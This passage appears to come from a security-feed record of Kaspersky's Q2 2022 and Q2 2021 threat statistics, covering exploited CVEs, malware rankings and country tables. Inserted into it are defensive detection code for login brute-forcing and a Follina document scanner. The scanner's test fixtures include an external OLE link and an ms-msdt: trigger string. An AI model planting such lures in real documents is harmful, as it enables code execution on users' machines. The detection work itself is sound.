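        print(f"{ip}: {a['failures']} failures {a['first']}..{a['last']}, users={a['users']}")
```

For RDP and SMB the same detector applies to Windows Security event 4625 records (logon type 10 for RDP, type 3 for SMB) once a parser for that event's fields replaces `parse_failed_logins`; only the regular expression changes. Tune `threshold` and `window` per service: interactive RDP logons fail far less often than scripted SQL logins, so a lower threshold is appropriate there.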
Finally, we observed a rise in attacks that exploit insecure deserialization, which can also give access to remote systems when untrusted user data passed to an application is validated incorrectly or not at all.\n\n### Vulnerability statistics\n\nExploits targeting Microsoft Office vulnerabilities grew in the second quarter to 82% of the total. Cybercriminals were spreading malicious documents that exploited [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), the best-known vulnerabilities in the Equation Editor component. Exploitation corrupts the component's memory, after which the attacker's payload embedded in the document runs on the target computer. Another vulnerability, [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), allows a malicious script to be downloaded and run when an infected document is opened, in order to perform various operations on the vulnerable system. The emergence of [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), [the Follina vulnerability](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>), also increased the number of exploits in this category. The attacker uses a specially crafted document that references an external OLE object; the HTML fetched from that reference invokes the ms-msdt: URI scheme, which makes Windows launch the MSDT diagnostics tool. 
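The Follina chain described above leaves two artifacts a scanner can key on: an `oleObject` relationship in the document package whose `TargetMode` is `External` (a benign document keeps its OLE objects inside the package), and an `ms-msdt:` URI in the HTML retrieved from that target. The following is an added example written for this page, not code from Securelist or from any published Follina analysis. It builds a minimal constructed .docx in memory (only the parts the scanner reads; the relationship XML is hand-written here), then inspects every `.rels` part; the helper names and the sample URL are this example's own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_URI_RE = re.compile(r"\bms-msdt:", re.IGNORECASE)


def build_sample_docx(ole_target: str, external: bool) -> bytes:
    """Construct a minimal .docx containing only the parts the scanner reads.
    Not a real sample: the relationship file is written by hand so the example
    runs offline. With external=True the oleObject relationship points outside
    the package, which is the shape Follina documents had."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        f'<Relationships xmlns="{REL_NS}">\n'
        '  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>\n'
        f'  <Relationship Id="rId2" Type="{OLE_REL}" Target="{ole_target}"{mode}/>\n'
        "</Relationships>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/'
                   'wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return (rels_part, target) for every oleObject relationship anywhere in
    the package whose TargetMode is External. Internal targets such as
    word/embeddings/oleObject1.bin are normal; a target fetched over the
    network when the document opens is the pattern to alert on."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL
                        and rel.get("TargetMode", "Internal").lower() == "external"):
                    findings.append((name, rel.get("Target")))
    return findings


def contains_msdt_uri(html: str) -> bool:
    """Second stage: the HTML served from the external target points the
    embedded browser control at an ms-msdt: URI. Flag any occurrence."""
    return MSDT_URI_RE.search(html) is not None


if __name__ == "__main__":
    # Constructed inputs: RFC 5737 documentation address, made-up path.
    suspicious = build_sample_docx("http://192.0.2.10/lure.html", external=True)
    benign = build_sample_docx("embeddings/oleObject1.bin", external=False)
    print(external_ole_targets(suspicious))   # one finding
    print(external_ole_targets(benign))       # []
    print(contains_msdt_uri('<script>location.href = "ms-msdt:/id PCWDiagnostic";</script>'))
```

The same relationship check, applied to the `attachedTemplate` relationship type instead of `oleObject`, catches remote-template injection documents, which use the identical external-fetch trick to pull a macro-bearing template at open time.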
When MSDT is launched with a specially crafted set of parameters, an arbitrary command executes on the victim's computer, even if macros are disabled and the document is opened in Protected View.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025713/09-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nAttempts to exploit vulnerabilities that affect various script engines and, specifically, browsers dipped to 5%. In the first half of the year, a number of critical RCE vulnerabilities were discovered in Chromium-based browsers: [CVE-2022-0609](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-0609>), [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>) and [CVE-2022-1364](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1364>). The first was found in the Animation component; it is a use-after-free bug that corrupts memory, after which the attacker creates crafted objects to execute arbitrary code. The second and third are type confusion bugs in the V8 script engine; they can likewise lead to arbitrary code execution on a vulnerable user's system. Some of these vulnerabilities were found to have been exploited in the wild in targeted attacks. Mozilla Firefox was found to contain a high-risk use-after-free vulnerability, [CVE-2022-1097](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1097>), which occurs when NSSToken objects are accessed from different threads. The browser was also found to contain [CVE-2022-28281](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28281>), a vulnerability in the WebAuthn extension. 
A compromised Firefox content process can write data out of bounds in the parent process's memory, potentially enabling code execution with elevated privileges. Two further vulnerabilities, [CVE-2022-1802](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>) and [CVE-2022-1529](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/>), were exploited in attacks. Both belong to the "prototype pollution" bug class, in which attacker-controlled properties injected into a JavaScript object's prototype chain end up being used by privileged code, allowing arbitrary JavaScript to execute in the context of the privileged parent browser process.\n\nAs in the previous quarter, Android exploits ranked third in our statistics with 4%, followed by exploits for Java applications, the Flash platform and PDF documents, each with 3%.\n\n## Attacks on macOS\n\nThe second quarter brought a new batch of cross-platform discoveries. For instance, a new APT group, [Earth Berberoka](<https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html>) (GamblingPuppet), which specializes in hacking online casinos, uses malware for Windows, Linux and macOS. 
The [TraderTraitor](<https://www.cisa.gov/uscert/ncas/alerts/aa22-108a>) campaign targets cryptocurrency and blockchain organizations, attacking with malicious crypto applications for both Windows and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 25.61 \n2 | AdWare.OSX.Agent.ai | 12.08 \n3 | AdWare.OSX.Pirrit.j | 7.84 \n4 | AdWare.OSX.Pirrit.ac | 7.58 \n5 | AdWare.OSX.Pirrit.o | 6.48 \n6 | Monitor.OSX.HistGrabber.b | 5.27 \n7 | AdWare.OSX.Agent.u | 4.27 \n8 | AdWare.OSX.Bnodlero.at | 3.99 \n9 | Trojan-Downloader.OSX.Shlayer.a | 3.87 \n10 | Downloader.OSX.Agent.k | 3.67 \n11 | AdWare.OSX.Pirrit.aa | 3.35 \n12 | AdWare.OSX.Pirrit.ae | 3.24 \n13 | Backdoor.OSX.Twenbc.e | 3.16 \n14 | AdWare.OSX.Bnodlero.ax | 3.06 \n15 | AdWare.OSX.Agent.q | 2.73 \n16 | Trojan-Downloader.OSX.Agent.h | 2.52 \n17 | AdWare.OSX.Bnodlero.bg | 2.42 \n18 | AdWare.OSX.Cimpli.m | 2.41 \n19 | AdWare.OSX.Pirrit.gen | 2.08 \n20 | AdWare.OSX.Agent.gen | 2.01 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, the TOP 20 ranking of threats detected by Kaspersky security solutions for macOS is dominated by adware. AdWare.OSX.Amc.e, also known as Advanced Mac Cleaner, is a newcomer and already the leader, encountered by a quarter of all attacked users. Members of this family display fake system problem messages and offer to sell the full version to fix them. 
It was followed by members of the AdWare.OSX.Agent and AdWare.OSX.Pirrit families.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025743/10-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 2.93 \n2 | Canada | 2.57 \n3 | Spain | 2.51 \n4 | United States | 2.45 \n5 | India | 2.24 \n6 | Italy | 2.21 \n7 | Russian Federation | 2.13 \n8 | United Kingdom | 1.97 \n9 | Mexico | 1.83 \n10 | Australia | 1.82 \n \n_* Excluded from the rating are countries and territories with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2022, the country where the most users were attacked was again France (2.93%), followed by Canada (2.57%) and Spain (2.51%). 
AdWare.OSX.Amc.e was the most common adware encountered in these three countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol, as before.\n\nTelnet | 82.93% \n---|--- \nSSH | 17.07% \n \n**_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2022_**\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 93.75% \n---|--- \nSSH | 6.25% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 36.28 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 14.66 \n3 | Backdoor.Linux.Mirai.ek | 9.15 \n4 | Backdoor.Linux.Mirai.ba | 8.82 \n5 | Trojan.Linux.Agent.gen | 4.01 \n6 | Trojan.Linux.Enemybot.a | 2.96 \n7 | Backdoor.Linux.Agent.bc | 2.58 \n8 | Trojan-Downloader.Shell.Agent.p | 2.36 \n9 | Trojan.Linux.Agent.mg | 1.72 \n10 | Backdoor.Linux.Mirai.cw | 1.45 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q2-2022/107025/#attacks-on-iot-honeypots>) for Q2 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### TOP 10 countries and territories that serve as sources of web-based attacks\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2022, Kaspersky solutions blocked 1,164,544,060 attacks launched from online resources across the globe. A total of 273,033,368 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025818/11-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users around the world, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **Malware** class; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 26.07 \n2 | Hong Kong | 14.60 \n3 | Algeria | 14.40 \n4 | Nepal | 14.00 \n5 | Tunisia | 13.55 \n6 | Serbia | 12.88 \n7 | Sri Lanka | 12.41 \n8 | Albania | 12.21 \n9 | Bangladesh | 11.98 \n10 | Greece | 11.86 \n11 | Palestine | 11.82 \n12 | Qatar | 11.50 \n13 | Moldova | 11.47 \n14 | Yemen | 11.44 \n15 | Libya | 11.34 \n16 | Zimbabwe | 11.15 \n17 | Morocco | 11.03 \n18 | Estonia | 11.01 \n19 | Turkey | 10.75 \n20 | Mongolia | 10.50 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 8.31% of the Internet users' computers worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025917/12-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2022, our File Anti-Virus detected **55,314,176** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries and territories.\n\nNote that these rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 47.54 \n2 | Tajikistan | 44.91 \n3 | Afghanistan | 43.19 \n4 | Yemen | 43.12 \n5 | Cuba | 42.71 \n6 | Ethiopia | 41.08 \n7 | Uzbekistan | 37.91 \n8 | Bangladesh | 37.90 \n9 | Myanmar | 36.97 \n10 | South Sudan | 36.60 \n11 | Syria | 35.60 \n12 | Burundi | 34.88 \n13 | Rwanda | 33.69 \n14 | Algeria | 33.61 \n15 | Benin | 33.60 \n16 | Tanzania | 32.88 \n17 | Malawi | 32.65 \n18 | Venezuela | 31.79 \n19 | Cameroon | 31.34 \n20 | Chad | 30.92 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025948/13-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nOn 
average worldwide, Malware-class local threats were registered on 14.65% of users' computers at least once during Q2. Russia scored 16.66% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-15T12:00:43", "type": "securelist", "title": "IT threat evolution in Q2 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1097", "CVE-2022-1364", "CVE-2022-1529", "CVE-2022-1802", "CVE-2022-22965", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24521", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-28281", "CVE-2022-30190"], "modified": "2022-08-15T12:00:43", "id": "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "href": "https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T10:37:29", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical 
data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2021:\n\n * Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.\n * Web antivirus recognized 675,832,360 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.\n * Ransomware attacks were defeated on the computers of 97,451 unique users.\n * Our file antivirus detected 68,294,298 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 119,252 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140610/01-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11140636/02-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.8 \n2 | Tajikistan | 5.0 \n3 | Afghanistan | 4.2 \n4 | Uzbekistan | 3.3 \n5 | Lithuania | 2.9 \n6 | Sudan | 2.8 \n7 | Paraguay | 2.5 \n8 | Zimbabwe | 1.6 \n9 | Costa Rica | 1.5 \n10 | Yemen | 1.5 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of 
Kaspersky products in the country._\n\nIn Q2, as per tradition, the most widespread family of bankers was ZeuS/Zbot (17.8%), but its share almost halved, falling by 13 p.p. Second place again went to the CliptoShuffler family (9.9%), whose share also fell, by 6 p.p. The Top 3 is rounded out by SpyEye (8.8%), which added 5 p.p., climbing from eighth place. Note the disappearance of Emotet from the Top 10, which was predictable given the liquidation of its infrastructure in the previous quarter.\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.8 \n2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.9 \n3 | SpyEye | Trojan-Spy.Win32.SpyEye | 8.8 \n4 | Trickster | Trojan.Win32.Trickster | 5.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.8 \n6 | Danabot | Trojan-Banker.Win32.Danabot | 3.6 \n7 | Nimnul | Virus.Win32.Nimnul | 3.3 \n8 | Cridex | Backdoor.Win32.Cridex | 2.3 \n9 | Nymaim | Trojan.Win32.Nymaim | 1.9 \n10 | Neurevt | Trojan.Win32.Neurevt | 1.6 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Colonial Pipeline and closure of DarkSide\n\nRansomware attacks on large organizations continued in Q2. Perhaps the most notable event of the quarter was the [attack by the DarkSide group on Colonial Pipeline](<https://ics-cert.kaspersky.com/reports/2021/05/21/darkchronicles-the-consequences-of-the-colonial-pipeline-attack/>), one of the largest fuel pipeline operators in the US. The incident led to fuel outages and a state of emergency in four states. The results of the investigation, which involved the FBI and several other US government agencies, were reported to US President Joe Biden.\n\nFor the cybercriminals, this sudden notoriety proved unwelcome. In their blog, DarkSide's creators heaped the blame on third-party operators. 
Another post was published stating that DarkSide's developers had lost access to part of their infrastructure and were shutting down the service and the affiliate program.\n\nAnother consequence of this high-profile incident was a new rule on the Russian-language forum XSS, where many developers of ransomware, including REvil (also known as Sodinokibi or Sodin), LockBit and Netwalker, advertise their affiliate programs. The new rule forbade the advertising and selling of any ransomware programs on the site. The administrators of other forums popular with cybercriminals took similar decisions.\n\n#### Closure of Avaddon\n\nAnother family of targeted ransomware whose owners shut up shop in Q2 is Avaddon. At the same time as announcing the shutdown, the attackers [provided](<https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/>) Bleeping Computer with the decryption keys.\n\n#### Clash with Clop\n\nUkrainian police [searched](<https://cyberpolice.gov.ua/news/kiberpolicziya-vykryla-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shyfruvalnyka-ta-nanesenni-inozemnym-kompaniyam-piv-milyarda-dolariv-zbytkiv-2402/>) and arrested members of the Clop group. Law enforcement agencies also deactivated part of the cybercriminals' infrastructure, which [did not](<https://www.bleepingcomputer.com/news/security/clop-ransomware-is-back-in-business-after-recent-arrests/>), however, stop the group's activities.\n\n#### Attacks on NAS devices\n\nIn Q2, cybercriminals stepped up their attacks on network-attached storage (NAS) devices. 
The new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family appeared, which packs user files into a password-protected 7zip archive, and our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | 
**Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. 
At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). 
This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. 
It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: 